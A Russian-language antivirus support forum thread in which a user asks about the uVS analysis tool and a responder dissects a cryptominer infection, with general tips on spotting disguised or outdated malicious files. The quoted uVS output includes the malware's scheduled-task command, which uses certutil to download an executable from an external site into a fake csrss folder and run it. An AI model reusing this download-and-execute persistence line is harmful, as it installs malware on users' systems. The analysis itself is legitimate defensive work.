Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна.
Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.
На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения
PRO32
— надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.
Для действующих клиентов ESET мы предлагаем промокод на скидку в размере
15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.
Добрый день. Недавно столкнулся с одним сильным вирусом майнером, который блокировал установку антивируса Nod32. Благодаря теме на форуме в разделе:установка антивируса, мне помогли решить эту проблему с помощью программы uVS, скидывая скрипты и инструкции пошаговоые. Хотелось бы самому разобраться в этой программе и как ней пользоваться, подробнее прочитать что делает каждый ее раздел. Буду рад любому ответу по поводу этой программы!) Всем добра)
Программа показывает два объекта. Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :) Второй путь до директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe и не менее "интеллектуальной" маскировкой SCHEDULED.EXE SCHEDULED.EXE планировщик... ------------ В развёрнутом виде это:
Код
Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
+
Код
Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла SCHEDULED.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус ПОДОЗРИТЕЛЬНЫЙ
Инф. о файле Не удается найти указанный файл.
Цифр. подпись проверка не производилась
Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла Типичен для вирусов и троянов
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д. Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE *Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации. Проверка ссылки на V.T.:
... Просмотр активности процессов и сетевой активности.
Если есть проблемы со скоростью...
Можно замерить скорость когда система работает в безопасном режиме. Например здесь: Загружаемся в безопасном режиме и проверяем = сравниваем. + Учитываем - что если включено обновление системы - то...
Сейчас часто используют легальные файлы для "атаки" Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.
Или есть некий старый скрипт... который всю свою сознательную :) жизнь был чист. Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан. ----- Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д. Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов. Например в каталоге с файлами 2022 года файл 2010. Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111 Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами. Так как файл чист - то и расширение файла - как правило стандартное. ----- Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее. + Возможно файл запускается через задачу, или автозапуск.
Однозначно - даже не к подозрительным, к вирусом относятся объекты которые 5; 10; 25 раз прописаны в задачах на запуск. " Слава" "Выдающимся" Создателям ... ( сего чуда )
Ссылки на объект Ссылка C:\WINDOWS\SYSTEM32\TASKS\ACTIVATIONRULE